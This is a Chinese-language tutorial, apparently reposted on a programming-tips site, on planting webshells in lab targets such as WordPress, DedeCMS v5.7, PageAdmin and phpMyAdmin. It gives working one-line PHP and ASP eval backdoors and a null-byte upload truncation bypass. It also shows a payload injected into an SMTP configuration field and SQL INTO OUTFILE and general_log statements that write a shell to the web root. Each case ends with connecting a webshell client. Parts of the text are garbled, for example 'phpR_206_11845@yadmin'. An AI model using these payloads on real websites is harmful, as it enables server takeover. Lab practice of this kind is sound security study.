程序笔记   发布时间:2022-07-04  发布网站:大佬教程  code.js-code.com
大佬教程收集整理的这篇文章主要介绍了拿webshell的一些姿势大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。

目录

  • 什么是websHell
  • 拿websHell的姿势
  • 实战案例
    • 编辑模板拿websHell
      • 案例1:wordpress
      • 案例2:织梦cms v5.7
    • 文件上传拿websHell
      • 案例1:织梦cms v5.7
      • 案例2:南方数据企业系统࿰c;后台上传截断拿websHell
    • 文件写入拿websHell
      • 案例1:织梦cms v5.7
      • 案例2:留言一句话到数据库拿websHell
    • zip自解压拿websHell
      • 案例1:wordpress
      • 案例2:pageadmin
    • 修改配置文件
      • 案例1:一句话插入配置文件拿websHell
      • 案例2:修改配置文件拿websHell
    • sql语句执行拿websHell
    • phpR_206_11845@yadmin拿websHell
      • 案例1:直接写sHell
      • 案例2:phpR_206_11845@yadmin 日志拿 websHell

什么是websHell

websHell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境࿰c;也可以将其称做为一种网页后门。黑客在入侵了一个网站后࿰c;通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起࿰c;然后就可以使用浏览器来访问该后门文件了࿰c;从而得到一个命令执行环境࿰c;以达到控制网站服务器的目的。 ​

顾名思义࿰c;“web”的含义是显然需要服务器开放web服务࿰c;“sHell”的含义是取得对服务器某种程度上的操作权限。websHell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于websHell其大多是以动态脚本的形式出现࿰c;也有人称之为网站的后门工具。 更详细的解释参见:WebsHell和一句话木马

拿websHell的姿势

  1. 编辑模板拿websHell

通过修改模块写入一句话࿰c;网站再调用模板的时࿰c;会自动加载这个模板࿰c;运行后门。

  1. 文件上传拿websHell

通过后台的上传模块࿰c;上传网页后门࿰c;就可以拿到websHell

  1. 文件写入拿websHell

通过可控参数将恶意代码写入文件里࿰c;即可获取websHell

  1. zip自解压拿websHell

上传zip文件࿰c;在其加入websHell文件࿰c;程序会自动解压࿰c;将后门解压到网站目录࿰c;可以获取websHell。

  1. 修改配置文件

通过修改网站的配置文件࿰c;直接把后门写到网站里

  1. 远程图片下载拿websHell

有的网站后台会存在远程图片下载功能࿰c;但是没有对其后缀名进行限制࿰c;导致可以下去websHell文件。

  1. 备份拿websHell

很多的asp网站 都存在备份功能࿰c;上传有恶意的图片࿰c;备份成脚本文件࿰c;即可获取websHell

  1. sql语句执行拿websHell

有的网站存在sql执行命令࿰c;可以通过命令备份或导出一句话后门到指定网站目录࿰c;即可获取websHell

  1. phpR_206_11845@yadmin拿websHell

使用命令进行读写文件 入后门࿰c;即可获取websHell

  1. 编辑器漏洞拿websHell

有的编辑器存在上传漏洞࿰c;通过编辑器漏洞可以获取网站的websHell。

实战案例

使用内部靶场 12server6 ࿰c;以NAT模式运行࿰c;设定为自动获取DNS、ip。之后启动护卫神-主机大师即可。

拿webshell的一些姿势

物理机修改hosts文件绑定靶机的地址即可。

拿webshell的一些姿势

编辑模板拿websHell

案例1:wordpress

在“外观”-“编辑”页面࿰c;随意选择一个主题࿰c;随意选择一个后缀是php的模板࿰c;然后写入一句话木马。这里写入的是<?php phpinfo();eval($_POST['cmd']);?>c;加上phpinfo主要是为了方便获知效果。

拿webshell的一些姿势

去靶机后台看看࿰c;确实写入成功。文件路径: C:Hws.comHwsHostMasterwwwrootwww.cbi1.comwebwp-contentthemestwentysixteen404.php

拿webshell的一些姿势

保存模板࿰c;然后访问路径。根据文件路径࿰c;可以反推出其url地址: (或者可以百度下“外观”-“编辑”的地址࿰c;或者自己本地搭建一下环境࿰c;获知地址) http://www.cbi1.com/wp-content/themes/twentysixteen/404.php

拿webshell的一些姿势

看到我们预留的phpinfo页面࿰c;说明地址没问题࿰c;然后连接websHell管理工具。 连接蚁剑࿰c;呃……页面显示有问题࿰c;切换成别的编码方式依然失败。gg

拿webshell的一些姿势

连接菜刀

@H_985_197@

案例2:织梦cms v5.7

访问“模块”-“默认模板管理”࿰c;这里选择 index.htm页面࿰c;点击“修改”

拿webshell的一些姿势

  1. 在主页添加一句话木马

拿webshell的一些姿势

拿webshell的一些姿势

  1. 更新主页

拿webshell的一些姿势

  1. 访问新主页

拿webshell的一些姿势

  1. 是预留的phpinfo页面

拿webshell的一些姿势

  1. 连接菜刀成功

拿webshell的一些姿势

那么࿰c;浏览器一路后退到更新页面࿰c;后缀保持为之前的html࿰c;再看看原本的效果

拿webshell的一些姿势

再打开就是原本的正常主页了࿰c;只不过在页面源代码中可以看见预留的一句话木马内容

拿webshell的一些姿势

文件上传拿websHell

案例1:织梦cms v5.7

准备个一句话木马:<?php phpinfo();eval($_POST['cmd']);?> 访问地址:http://www.cbi2.com/dede/

拿webshell的一些姿势

拿webshell的一些姿势

拿webshell的一些姿势

去靶机后台瞅瞅࿰c;传上去了

拿webshell的一些姿势

访问一下websHell地址࿰c;看到我们预留的phpinfo页面了࿰c;说明地址没问题

拿webshell的一些姿势

连接菜刀成功。

拿webshell的一些姿势

案例2:南方数据企业系统࿰c;后台上传截断拿websHell

  1. 在“新闻资讯”-“添加新闻”模块中࿰c;在“新闻图片”中点击“上传”按钮࿰c;会出现一个弹窗࿰c;复制弹窗的地址࿰c;在新标签页中打开

拿webshell的一些姿势

  1. 本地准备个asp类型的一句话木马:<%eval request("cmd")%>

拿webshell的一些姿势

  1. BurpSuite拦截

拿webshell的一些姿势

在路径后面添加 hack.asp%00 ࿰c;并对%00编码

拿webshell的一些姿势

进行URL编码之后࿰c;正常情况下应该出现一个有点像汉字“口”的东西࿰c;如果没有出现࿰c;就说明哪里出问题了。 (也完全可能是编码成功࿰c;只是字体原因导致的这种显示结果)

拿webshell的一些姿势

换个版本的BurpSuite࿰c;并重置一下BurpSuite。显示出“口”了࿰c;然后修改一下文件后缀࿰c;上传失败。

拿webshell的一些姿势

上网查了一下࿰c;是文件内容太少了࿰c;填充些垃圾数据࿰c;重新上传。

拿webshell的一些姿势

  1. 上传成功

拿webshell的一些姿势

  1. 连接菜刀

拿webshell的一些姿势

文件写入拿websHell

案例1:织梦cms v5.7

  1. 在“模块”-“广告管理”中࿰c;点击“增加一个新广告”

拿webshell的一些姿势

  1. 便填点东西࿰c;一句话木马:<?php phpinfo();eval($_POST['cmd']);?>

    拿webshell的一些姿势

  2. 获取页面地址

拿webshell的一些姿势

拿webshell的一些姿势

  1. 访问页面地址࿰c;发现没有phpinfo页面

拿webshell的一些姿势

  1. 先看看网站数据库后台࿰c;发现写进去了

拿webshell的一些姿势

  1. 那就试试菜刀怎么样吧

拿webshell的一些姿势

拿webshell的一些姿势

案例2:留言一句话到数据库拿websHell

  1. 在“系统管理”-“网站配置”页面࿰c;添加允许上传的文件类型

拿webshell的一些姿势

  1. 在“下载中心”-“添加下载程序”中࿰c;上传一句话木马

拿webshell的一些姿势

  1. 这里使用php一句话木马:<?php phpinfo();eval($_POST['cmd']);?>

拿webshell的一些姿势

  1. 发现上传失败࿰c;这里我们只需要在后门文件中填充大量垃圾字符即可。

拿webshell的一些姿势

再次点击“上传”按钮后࿰c;上传成功

拿webshell的一些姿势

访问以下文件地址࿰c;看到了预留的phpinfo页面

拿webshell的一些姿势

成功连接菜刀

拿webshell的一些姿势

zip自解压拿websHell

案例1:wordpress

在“外观”-“主题”页面࿰c;通过“添加”按钮添加zIP类型的主题࿰c;之后网站会对其解压。

拿webshell的一些姿势

我们可以上网上找主题࿰c;或者直接改个名字来套用网站的主题。我这里选择后者。 把网站后台的 twentysixteen 主题拿过来改个名字为 hackyou࿰c;确认404.php 文件里存在一句话木马࿰c;然后将hackyou文件夹打包成zip࿰c;上传网站。

拿webshell的一些姿势

拿webshell的一些姿势

拿webshell的一些姿势

去靶机后台瞅一眼。上传成功了

拿webshell的一些姿势

访问websHell地址

拿webshell的一些姿势

连接websHell管理工具

拿webshell的一些姿势

案例2:pageadmin

通过以下位置来上传文件

拿webshell的一些姿势

  1. 准备一个asp木马࿰c;并将其打包成zip

<%eval request("cmd")%>

拿webshell的一些姿势

  1. 找到文件的所在路径

拿webshell的一些姿势

  1. 访问websHell地址࿰c;连接菜刀

http://www.cbi9.com/templates/hack/hack.asp

拿webshell的一些姿势

修改配置文件

案例1:一句话插入配置文件拿websHell

smtp服务器的框中࿰c;写入:smtp.163.com"%><%eval request(chr(35))%><% s="

拿webshell的一些姿势

连接菜刀:

拿webshell的一些姿势

拿webshell的一些姿势

案例2:修改配置文件拿websHell

直接写入一句话木马

拿webshell的一些姿势

连接菜刀

拿webshell的一些姿势

@H_417_607@

sql语句执行拿websHell

参见之前的文章:https://blog.csdn.net/weixin_44288604/article/details/120680334

phpR_206_11845@yadmin拿websHell

换用自己的win7靶机

案例1:直接写sHell

方式同第8节࿰c;只不过这里不是在࿰c;存在sql注入的位置写࿰c;而是去phpR_206_11845@yadmin中写 SELEct '<?php phpinfo();eval($_POST[cmd]);?>' into outfile 'C:/phpstudy/www/hack.php'

拿webshell的一些姿势

页面有我们预留的phpinfo

拿webshell的一些姿势

连接菜刀

拿webshell的一些姿势

案例2:phpR_206_11845@yadmin 日志拿 websHell

  1. 开启日志记录
  • SET global general_log = “ON”; 日志保存状态开启;
  • SET global general_log_file =‘C:/phpstudy/www/phplog.php’; 修改日志的保存位置。

拿webshell的一些姿势

方式1:点击“编辑”按钮࿰c;直接编辑

拿webshell的一些姿势

方式2:通过执行sql语句来进行修改

拿webshell的一些姿势

  1. 执行websHell语句

SELEct '<?php phpinfo();eval($_POST[cmd]);?>'

拿webshell的一些姿势

执行成功

拿webshell的一些姿势

看到预留的phpinfo页面

拿webshell的一些姿势

连接菜刀成功

拿webshell的一些姿势

WebsHell和一句话木马

大佬总结

以上是大佬教程为你收集整理的拿webshell的一些姿势全部内容,希望文章能够帮你解决拿webshell的一些姿势所遇到的程序开发问题。

如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。